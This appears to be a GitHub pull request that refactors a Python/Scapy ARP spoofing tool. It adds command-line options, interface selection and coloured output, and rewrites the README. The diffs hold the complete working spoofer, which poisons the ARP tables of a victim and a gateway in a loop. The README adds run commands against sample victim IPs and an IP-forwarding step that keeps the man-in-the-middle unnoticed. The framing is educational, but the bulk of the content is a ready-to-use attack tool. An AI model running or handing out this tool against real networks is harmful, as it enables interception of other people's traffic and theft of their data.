### PR TITLE
Refactor ARP Spoofing Tool: Added Interface Support, argparse, and Colorama Integration

### DIFF
--- a/README.md
+++ b/README.md
@@ -1,71 +1,205 @@
-# ARP Spoofing
+### Güncellenmiş Kod
 
-The following repository is part of a workshop that reflects a way of performing LAN network attacks.
+Aşağıda `interface` eklenmiş güncellenmiş kod yer alıyor. Artık kullanıcıdan ağ arayüzünü de komut satırında alabileceksiniz:
 
-The `spoofing.py` script performs an `ARP spoofing` attack with the help of `Scapy`, a Python package for packet crafting.
+```python
+#!/usr/bin/python
 
-The `ARP spoofing` attack is the foundation for intercepting connections between different users on the same subnet. Basically the script is going to perform a `MITM` connection instead of performing an original connection. The `ARP packet` allows the users to identify themself on a network, computers do not understand IP addresses, and for that, every machine has an `ARP table` which contains the `MAC addresses` and their corresponded `IP address` for each element on the LAN.
+import scapy.all as scapy
+import argparse
+from colorama import Fore, Style, init
 
-The whole idea is send responses ("malformed packets") to the `router` and to the `victim` telling that the router is the `MAC address` of the `attacker machine`, this will change the whole data flow and the victim's traffic will be forwarded to the attacker machine.
+# Initialize colorama
+init(autoreset=True)
+
+class ArpSpoofer:
+    def __init__(self, target_ip, spoof_ip, interface):
+        """
+        Constructor for ArpSpoofer class. Initializes target, spoof IP addresses, and network interface.
+        
+        :param target_ip: The target machine's IP address.
+        :param spoof_ip: The IP address you want to impersonate (e.g., the gateway).
+        :param interface: The network interface to use for packet sending.
+        """
+        self.target_ip = target_ip
+        self.spoof_ip = spoof_ip
+        self.interface = interface
+
+    def get_mac(self, ip):
+        """
+        Sends an ARP request to retrieve the MAC address of the specified IP.
+        
+        :param ip: The IP address to get the MAC address for.
+        :return: The MAC address of the target IP.
+        """
+        request = scapy.ARP(pdst=ip)
+        broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
+        final_packet = broadcast / request
+        answer = scapy.srp(final_packet, iface=self.interface, timeout=2, verbose=False)[0]
+        mac = answer[0][1].hwsrc
+        return mac
+
+    def spoof(self, target, spoofed):
+        """
+        Spoofs the target machine by pretending to be the spoofed IP address.
+        
+        :param target: The target IP address to attack.
+        :param spoofed: The IP address you're pretending to be (usually the gateway).
+        """
+        mac = self.get_mac(target)
+        packet = scapy.ARP(op=2, hwdst=mac, pdst=target, psrc=spoofed)
+        scapy.send(packet, iface=self.interface, verbose=False)
+        print(Fore.YELLOW + f"[+] Spoofing {target} pretending to be {spoofed}")
+
+    def restore(self, dest_ip, source_ip):
+        """
+        Restores the ARP table of the target to its original state.
+        
+        :param dest_ip: The destination IP whose ARP table is being restored (e.g., target machine).
+        :param source_ip: The IP to restore to its legitimate MAC address (e.g., gateway).
+        """
+        dest_mac = self.get_mac(dest_ip)
+        source_mac = self.get_mac(source_ip)
+        packet = scapy.ARP(op=2, pdst=dest_ip, hwdst=dest_mac, psrc=source_ip, hwsrc=source_mac)
+        scapy.send(packet, iface=self.interface, verbose=False)
+        print(Fore.GREEN + f"[+] Restoring {dest_ip} to its original state.")
+
+    def run(self):
+        """
+        Starts the ARP spoofing attack by continuously sending spoofed packets.
+        Restores ARP tables upon interruption (CTRL+C).
+        """
+        try:
+            while True:
+                self.spoof(self.target_ip, self.spoof_ip)  # Spoof the target IP
+                self.spoof(self.spoof_ip, self.target_ip)  # Spoof the spoofed IP
+        except KeyboardInterrupt:
+            print(Fore.RED + "[!] Detected CTRL+C. Restoring ARP tables... Please wait.")
+            self.restore(self.target_ip, self.spoof_ip)
+            self.restore(self.spoof_ip, self.target_ip)
+            print(Fore.GREEN + "[+] ARP tables restored.")
+
+if __name__ == "__main__":
+    # Setting up argparse for command-line arguments
+    parser = argparse.ArgumentParser(description="ARP Spoofing Tool to sniff network traffic.")
+    parser.add_argument("-t", "--target", required=True, help="Target IP address to spoof.")
+    parser.add_argument("-s", "--spoof", required=True, help="Spoofed IP address (e.g., the gateway IP).")
+    parser.add_argument("-i", "--interface", required=True, help="Network interface to use (e.g., eth0, wlan0).")
+
+    # Parse the arguments
+    args = parser.parse_args()
+
+    # Create an ArpSpoofer object and start the spoofing process
+    spoofer = ArpSpoofer(target_ip=args.target, spoof_ip=args.spoof, interface=args.interface)
+    spoofer.run()
+```
+
+### Güncellenmiş README.md
+
+```markdown
+# ARP Spoofing Tool
+
+## Description
+
+This repository contains an ARP spoofing tool that demonstrates how to perform LAN network attacks using `Scapy`, a Python package for crafting and manipulating network packets. The `spoofing.py` script is designed to carry out an `ARP spoofing` attack, enabling the attacker to intercept communications and perform a Man-in-the-Middle (MITM) attack.
+
+The attack works by tricking a target device on the same subnet into thinking that the attacker's machine is the router (gateway), thereby redirecting traffic through the attacker.
+
+## How It Works
+
+1. The attacker sends fake ARP responses to both the victim and the router, associating the attacker's MAC address with the router's IP address.
+2. This alters the ARP tables of the victim and the router, redirecting traffic from the victim to the attacker.
+3. The attacker can now intercept and manipulate network traffic, potentially gaining access to sensitive information.
 
 ## Scenario
 
-For this example, I used a` Windows 10 machine` (192.168.1.130) as the `victim`, and a `Kali machine` as the `attacker` (192.168.1.111). The router used the `GW Ip address` (the 192.168.1.1)
+For this example:
+- The victim is a `Windows 10 machine` (192.168.1.130).
+- The attacker is using a `Kali Linux` machine (192.168.1.111).
+- The router has the IP address `192.168.1.1`.
 
-Basically, its something like the following:
+Steps:
+- The victim sends an ARP request for the router's MAC address.
+- The attacker sends a fake ARP response, claiming to be the router.
+- The victim updates its ARP table with the attacker's MAC address, redirecting traffic through the attacker.
 
-- The `victim` asks for the `MAC address` of the `router`
-- Sends a request, and the machine with that particular `MAC address` will respond
-- The `victim` PC will update its `ARP table` with the` MAC address` of the requested machine
-- The `ARP spoofing` generates a communication between the victim and the attacker (tricking the user by saying that we are the router)
-- Later we can sniff communications on the `LAN network` and check for `non-encrypted data` passed
+## Forwarding Traffic
 
-## How it works
+To prevent a Denial of Service (DoS) condition where the victim loses internet access, the attacker can enable IP forwarding. This allows the attacker to pass traffic between the victim and the router while still intercepting it.
 
-Using `Scapy` lets you craft or construct your own packets, sending it by your own needs, this means that we can manipulate request data, responses and plenty more.
-
-Internally does the following.
-
-1. Creates an Ethernet broadcast package using the `router MAC address`
-2. AN `ARP packet` is created with the `router IP destination`
-3. Another packet is created, and it concatenates both the `Ether` and the `ARP`. This is sent to the network (to the `router` actually)
-4. The victim will receive the `router's` `hwsrc` (hardware source) MAC address.  This part is tricky because the `source` element is the router, it is the response, with that value, we are able to perform the second part of the MITM
-
-### What's behind the MITM
-
-Just we need to create a malformed packet which flip the `hwsrc` and `hwdst`, this will let you fool the `ARP table`, by telling that the router MAC address is our MAC address.
-
-## Forwarding traffic
-
-When the complete `MITM cycle` is done, the victim machine will lose internet connection, this makes the attack very obvious. The victim can check the `ARP table` with the `arp -a` command and see what's going on with the router. Basically this attack results in a `DoS` to the whole LAN network
-
-So, for this particular scenario, we can forward the traffic letting the router act as well, the victim machine will resolve the internet connection and the attacker will have the capability to persist the `ARP spoofing`.
-
-Check the `/proc/sys/net/ipv4/ip_forward`, on the attacker machine, if the value is `0`, which means that the interface is not supporting the network forwarding.
-
-Do `echo 1 > /proc/sys/net/ipv4/ip_forward` and run the script again.
-
+To enable IP forwarding on the attacker's machine:
+```bash
+echo 1 > /proc/sys/net/ipv4/ip_forward
+```
 
 ## Usage
 
-Check and correct (if necessary) the hard-coded IP addresses, give execution permissions and run the file, like:
+Make sure you adjust the IP addresses and the network interface in the script if necessary.
 
-`./spoofing.py`
+Run the script with the following command:
+```bash
+sudo ./spoofing.py -t <target_ip> -s <spoofed_ip> -i <interface>
+```
 
-Once the program is interrupted, the restoring function is triggered. (Default MAC addresses)
+### Example:
+```bash
+sudo ./spoofing.py -t 192.168.1.130 -s 192.168.1.1 -i eth0
+```
 
-## Set up
+When the script is interrupted (e.g., by pressing `CTRL+C`), it will automatically restore the ARP tables of the victim and router to their original state.
 
-Simple, just.
+## Setup
 
-`virtualenv -p python3 <name_of_the_env>`
+To set up the environment:
+1. Create a virtual environment (optional):
+   ```bash
+   virtualenv -p python3 <name_of_the_env>
+   source <name_of_the_env>/bin/activate
+   ```
+2. Install the required dependencies:
+   ```bash
+   pip install -r requirements.txt
+   ```
 
-Important: check the `requirements.txt` for dependencies
+## Dependencies
+
+- **Scapy**: For crafting and sending ARP packets.
+- **colorama**: For colored terminal output.
+- **argparse**: For parsing command-line arguments.
+
+## Updates by Halil İbrahim
+
+This tool has been updated and refactored by **Halil İbrahim**. The updates include:
+- Class-based structure for better maintainability.
+- Command-line argument parsing using `argparse` for flexible usage.
+- Color-coded output using `colorama` for better readability.
+
+Visit [denizhalil.com](https://denizhalil.com) for more tools, tutorials, and cybersecurity resources.
+
+### Check Out My Books
+- **Mastering Linux Networking and Security: Essential and Advanced Techniques**  
+  [Support on BuyMeACoffee](https://www.buymeacoffee.com/halildeniz/e/315997)
+  
+- **Mastering Scapy: A Comprehensive Guide to Network Analysis**  
+  [Support on BuyMeACoffee](https://www.buymeacoffee.com/halildeniz/e/182908)
+  
+- **Mastering Python for Ethical Hacking: A Comprehensive Guide to Building Hacking Tools**
+
+## Join the Community
+
+Feel free to join our **Production Brain** Discord server to discuss cybersecurity, Python projects, and more:  
+[Join Production Brain Discord](https://discord.gg/nGBpfMHX4u)
 
 ## Credits
 
- - [David E Lares](https://twitter.com/davidlares3)
+- Original author: [David E Lares](https://twitter.com/davidlares3)
+- Updated by: Halil İbrahim (denizhalil.com)
 
 ## License
 
- - [MIT](https://opensource.org/licenses/MIT)
+- [MIT License](https://opensource.org/licenses/MIT)
+```
+
+### Değişiklikler:
+- `interface` desteği eklendi.
+- README.md dosyası, `interface` kullanımını ve güncellemeleri açıklayacak şekilde yeniden düzenlendi.

--- a/README.md
+++ b/README.md
@@ -1,205 +1,101 @@
-### Güncellenmiş Kod
-
-Aşağıda `interface` eklenmiş güncellenmiş kod yer alıyor. Artık kullanıcıdan ağ arayüzünü de komut satırında alabileceksiniz:
-
-```python
-#!/usr/bin/python
-
-import scapy.all as scapy
-import argparse
-from colorama import Fore, Style, init
-
-# Initialize colorama
-init(autoreset=True)
-
-class ArpSpoofer:
-    def __init__(self, target_ip, spoof_ip, interface):
-        """
-        Constructor for ArpSpoofer class. Initializes target, spoof IP addresses, and network interface.
-        
-        :param target_ip: The target machine's IP address.
-        :param spoof_ip: The IP address you want to impersonate (e.g., the gateway).
-        :param interface: The network interface to use for packet sending.
-        """
-        self.target_ip = target_ip
-        self.spoof_ip = spoof_ip
-        self.interface = interface
-
-    def get_mac(self, ip):
-        """
-        Sends an ARP request to retrieve the MAC address of the specified IP.
-        
-        :param ip: The IP address to get the MAC address for.
-        :return: The MAC address of the target IP.
-        """
-        request = scapy.ARP(pdst=ip)
-        broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
-        final_packet = broadcast / request
-        answer = scapy.srp(final_packet, iface=self.interface, timeout=2, verbose=False)[0]
-        mac = answer[0][1].hwsrc
-        return mac
-
-    def spoof(self, target, spoofed):
-        """
-        Spoofs the target machine by pretending to be the spoofed IP address.
-        
-        :param target: The target IP address to attack.
-        :param spoofed: The IP address you're pretending to be (usually the gateway).
-        """
-        mac = self.get_mac(target)
-        packet = scapy.ARP(op=2, hwdst=mac, pdst=target, psrc=spoofed)
-        scapy.send(packet, iface=self.interface, verbose=False)
-        print(Fore.YELLOW + f"[+] Spoofing {target} pretending to be {spoofed}")
-
-    def restore(self, dest_ip, source_ip):
-        """
-        Restores the ARP table of the target to its original state.
-        
-        :param dest_ip: The destination IP whose ARP table is being restored (e.g., target machine).
-        :param source_ip: The IP to restore to its legitimate MAC address (e.g., gateway).
-        """
-        dest_mac = self.get_mac(dest_ip)
-        source_mac = self.get_mac(source_ip)
-        packet = scapy.ARP(op=2, pdst=dest_ip, hwdst=dest_mac, psrc=source_ip, hwsrc=source_mac)
-        scapy.send(packet, iface=self.interface, verbose=False)
-        print(Fore.GREEN + f"[+] Restoring {dest_ip} to its original state.")
-
-    def run(self):
-        """
-        Starts the ARP spoofing attack by continuously sending spoofed packets.
-        Restores ARP tables upon interruption (CTRL+C).
-        """
-        try:
-            while True:
-                self.spoof(self.target_ip, self.spoof_ip)  # Spoof the target IP
-                self.spoof(self.spoof_ip, self.target_ip)  # Spoof the spoofed IP
-        except KeyboardInterrupt:
-            print(Fore.RED + "[!] Detected CTRL+C. Restoring ARP tables... Please wait.")
-            self.restore(self.target_ip, self.spoof_ip)
-            self.restore(self.spoof_ip, self.target_ip)
-            print(Fore.GREEN + "[+] ARP tables restored.")
-
-if __name__ == "__main__":
-    # Setting up argparse for command-line arguments
-    parser = argparse.ArgumentParser(description="ARP Spoofing Tool to sniff network traffic.")
-    parser.add_argument("-t", "--target", required=True, help="Target IP address to spoof.")
-    parser.add_argument("-s", "--spoof", required=True, help="Spoofed IP address (e.g., the gateway IP).")
-    parser.add_argument("-i", "--interface", required=True, help="Network interface to use (e.g., eth0, wlan0).")
-
-    # Parse the arguments
-    args = parser.parse_args()
-
-    # Create an ArpSpoofer object and start the spoofing process
-    spoofer = ArpSpoofer(target_ip=args.target, spoof_ip=args.spoof, interface=args.interface)
-    spoofer.run()
-```
-
-### Güncellenmiş README.md
-
-```markdown
 # ARP Spoofing Tool
 
-## Description
+#### Description
 
-This repository contains an ARP spoofing tool that demonstrates how to perform LAN network attacks using `Scapy`, a Python package for crafting and manipulating network packets. The `spoofing.py` script is designed to carry out an `ARP spoofing` attack, enabling the attacker to intercept communications and perform a Man-in-the-Middle (MITM) attack.
+This tool demonstrates how to perform an ARP spoofing attack on a Local Area Network (LAN) using Python and the `Scapy` library. The ARP spoofing attack redirects network traffic from the victim to the attacker by sending forged ARP responses, allowing for a Man-in-the-Middle (MITM) attack. The attacker impersonates the router or gateway to intercept the victim's traffic and forward it through the attacker's machine.
 
-The attack works by tricking a target device on the same subnet into thinking that the attacker's machine is the router (gateway), thereby redirecting traffic through the attacker.
+With this script, you can simulate a MITM attack, allowing the attacker to intercept non-encrypted traffic from the target device.
 
-## How It Works
+#### How ARP Spoofing Works
 
 1. The attacker sends fake ARP responses to both the victim and the router, associating the attacker's MAC address with the router's IP address.
-2. This alters the ARP tables of the victim and the router, redirecting traffic from the victim to the attacker.
-3. The attacker can now intercept and manipulate network traffic, potentially gaining access to sensitive information.
+2. This causes the victim to send its traffic to the attacker, believing it to be the router.
+3. The attacker forwards the traffic to the actual router, intercepting and potentially manipulating the data.
 
-## Scenario
+#### Scenario
 
 For this example:
-- The victim is a `Windows 10 machine` (192.168.1.130).
-- The attacker is using a `Kali Linux` machine (192.168.1.111).
-- The router has the IP address `192.168.1.1`.
+- **Victim**: Windows 10 machine (`192.168.1.130`)
+- **Attacker**: Kali Linux machine (`192.168.1.111`)
+- **Router**: Default gateway (`192.168.1.1`)
 
-Steps:
-- The victim sends an ARP request for the router's MAC address.
-- The attacker sends a fake ARP response, claiming to be the router.
-- The victim updates its ARP table with the attacker's MAC address, redirecting traffic through the attacker.
+#### Steps:
 
-## Forwarding Traffic
+1. The victim sends an ARP request to find the MAC address of the router.
+2. The attacker sends a fake ARP response, claiming that the attacker's MAC address is associated with the router's IP.
+3. The victim updates its ARP table with the attacker's MAC address, redirecting traffic to the attacker instead of the router.
 
-To prevent a Denial of Service (DoS) condition where the victim loses internet access, the attacker can enable IP forwarding. This allows the attacker to pass traffic between the victim and the router while still intercepting it.
+#### Forwarding Traffic
 
-To enable IP forwarding on the attacker's machine:
+To prevent a Denial of Service (DoS) situation where the victim loses internet access, you need to enable IP forwarding on the attacker's machine. This allows the attacker to pass traffic between the victim and the router, maintaining the internet connection while still intercepting traffic.
+
+To enable IP forwarding on Linux:
 ```bash
 echo 1 > /proc/sys/net/ipv4/ip_forward
 ```
 
-## Usage
+#### Usage
 
-Make sure you adjust the IP addresses and the network interface in the script if necessary.
+Make sure to specify the correct IP addresses and the network interface.
 
-Run the script with the following command:
+#### Command:
 ```bash
 sudo ./spoofing.py -t <target_ip> -s <spoofed_ip> -i <interface>
 ```
 
-### Example:
+#### Example:
 ```bash
 sudo ./spoofing.py -t 192.168.1.130 -s 192.168.1.1 -i eth0
 ```
 
-When the script is interrupted (e.g., by pressing `CTRL+C`), it will automatically restore the ARP tables of the victim and router to their original state.
+- `-t` or `--target`: The victim's IP address.
+- `-s` or `--spoof`: The IP address you want to spoof (e.g., the router).
+- `-i` or `--interface`: The network interface to use (e.g., `eth0`, `wlan0`).
 
-## Setup
+When the program is interrupted (e.g., by pressing `CTRL+C`), the script will automatically restore the ARP tables of the victim and the router to their original state.
 
-To set up the environment:
-1. Create a virtual environment (optional):
+#### Setup
+
+1. (Optional) Set up a virtual environment:
    ```bash
-   virtualenv -p python3 <name_of_the_env>
-   source <name_of_the_env>/bin/activate
+   virtualenv -p python3 <env_name>
+   source <env_name>/bin/activate
    ```
-2. Install the required dependencies:
+   
+2. Install dependencies:
    ```bash
    pip install -r requirements.txt
    ```
 
-## Dependencies
+#### Dependencies
 
-- **Scapy**: For crafting and sending ARP packets.
-- **colorama**: For colored terminal output.
-- **argparse**: For parsing command-line arguments.
+- **Scapy**: A powerful Python library for packet crafting and network analysis.
+- **argparse**: For command-line argument parsing.
+- **colorama**: For adding colored output to terminal messages.
 
-## Updates by Halil İbrahim
+#### Check Out My Books
 
-This tool has been updated and refactored by **Halil İbrahim**. The updates include:
-- Class-based structure for better maintainability.
-- Command-line argument parsing using `argparse` for flexible usage.
-- Color-coded output using `colorama` for better readability.
-
-Visit [denizhalil.com](https://denizhalil.com) for more tools, tutorials, and cybersecurity resources.
-
-### Check Out My Books
 - **Mastering Linux Networking and Security: Essential and Advanced Techniques**  
   [Support on BuyMeACoffee](https://www.buymeacoffee.com/halildeniz/e/315997)
-  
+
 - **Mastering Scapy: A Comprehensive Guide to Network Analysis**  
   [Support on BuyMeACoffee](https://www.buymeacoffee.com/halildeniz/e/182908)
-  
-- **Mastering Python for Ethical Hacking: A Comprehensive Guide to Building Hacking Tools**
 
-## Join the Community
+- **Mastering Python for Ethical Hacking: A Comprehensive Guide to Building Hacking Tools**  
+  [Support on BuyMeACoffee](https://buymeacoffee.com/halildeniz/e/296372)
+
+#### Join the Community
 
 Feel free to join our **Production Brain** Discord server to discuss cybersecurity, Python projects, and more:  
 [Join Production Brain Discord](https://discord.gg/nGBpfMHX4u)
 
-## Credits
+This project continues to grow with community feedback and contributions!
 
-- Original author: [David E Lares](https://twitter.com/davidlares3)
-- Updated by: Halil İbrahim (denizhalil.com)
+#### Credits
 
-## License
+- **Original Author**: [David E Lares](https://twitter.com/davidlares3)
+- **Updated by**: Halil İbrahim ([denizhalil.com](https://denizhalil.com))
+
+#### License
 
 - [MIT License](https://opensource.org/licenses/MIT)
-```
-
-### Değişiklikler:
-- `interface` desteği eklendi.
-- README.md dosyası, `interface` kullanımını ve güncellemeleri açıklayacak şekilde yeniden düzenlendi.

--- a/spoofer.py
+++ b/spoofer.py
@@ -8,33 +8,39 @@ from colorama import Fore, Style, init
 init(autoreset=True)
 
 class ArpSpoofer:
-    def __init__(self, target_ip, spoof_ip):
+    def __init__(self, target_ip, spoof_ip, interface):
+        #  Constructor for ArpSpoofer class. Initializes target, spoof IP addresses, and network interface.
         self.target_ip = target_ip
         self.spoof_ip = spoof_ip
+        self.interface = interface
 
     def get_mac(self, ip):
-        # ARP request to get the MAC address
+        # Sends an ARP request to retrieve the MAC address of the specified IP
         request = scapy.ARP(pdst=ip)
         broadcast = scapy.Ether(dst="ff:ff:ff:ff:ff:ff")
         final_packet = broadcast / request
-        answer = scapy.srp(final_packet, timeout=2, verbose=False)[0]
+        answer = scapy.srp(final_packet, iface=self.interface, timeout=2, verbose=False)[0]
         mac = answer[0][1].hwsrc
         return mac
 
     def spoof(self, target, spoofed):
+        # Spoofs the target machine by pretending to be the spoofed IP address.
         mac = self.get_mac(target)
         packet = scapy.ARP(op=2, hwdst=mac, pdst=target, psrc=spoofed)
-        scapy.send(packet, verbose=False)
+        scapy.send(packet, iface=self.interface, verbose=False)
         print(Fore.YELLOW + f"[+] Spoofing {target} pretending to be {spoofed}")
 
     def restore(self, dest_ip, source_ip):
+        # Restores the ARP table of the target to its original state.
         dest_mac = self.get_mac(dest_ip)
         source_mac = self.get_mac(source_ip)
         packet = scapy.ARP(op=2, pdst=dest_ip, hwdst=dest_mac, psrc=source_ip, hwsrc=source_mac)
-        scapy.send(packet, verbose=False)
+        scapy.send(packet, iface=self.interface, verbose=False)
         print(Fore.GREEN + f"[+] Restoring {dest_ip} to its original state.")
 
     def run(self):
+        # Starts the ARP spoofing attack by continuously sending spoofed packets.
+        # Restores ARP tables upon interruption (CTRL+C).
         try:
             while True:
                 self.spoof(self.target_ip, self.spoof_ip)  # Spoof the target IP
@@ -50,10 +56,11 @@ if __name__ == "__main__":
     parser = argparse.ArgumentParser(description="ARP Spoofing Tool to sniff network traffic.")
     parser.add_argument("-t", "--target", required=True, help="Target IP address to spoof.")
     parser.add_argument("-s", "--spoof", required=True, help="Spoofed IP address (e.g., the gateway IP).")
+    parser.add_argument("-i", "--interface", required=True, help="Network interface to use (e.g., eth0, wlan0).")
 
     # Parse the arguments
     args = parser.parse_args()
 
     # Create an ArpSpoofer object and start the spoofing process
-    spoofer = ArpSpoofer(target_ip=args.target, spoof_ip=args.spoof)
+    spoofer = ArpSpoofer(target_ip=args.target, spoof_ip=args.spoof, interface=args.interface)
     spoofer.run()


### PR DESCRIPTION
This update enhances the ARP Spoofing tool with the following improvements:

- **Interface Support**: Added the option to specify the network interface through command-line arguments using `argparse`.
- **argparse Integration**: Refactored the script to use `argparse` for flexible command-line argument parsing, allowing the user to input the target IP, spoof IP, and network interface.
- **colorama Integration**: Added colorized output using `colorama` for better readability and user experience.
- **Improved Documentation**: Updated the `README.md` to reflect the new functionality, providing clear usage examples, setup instructions, and additional details about ARP spoofing.

This refactor makes the tool more user-friendly, maintainable, and versatile for different network setups.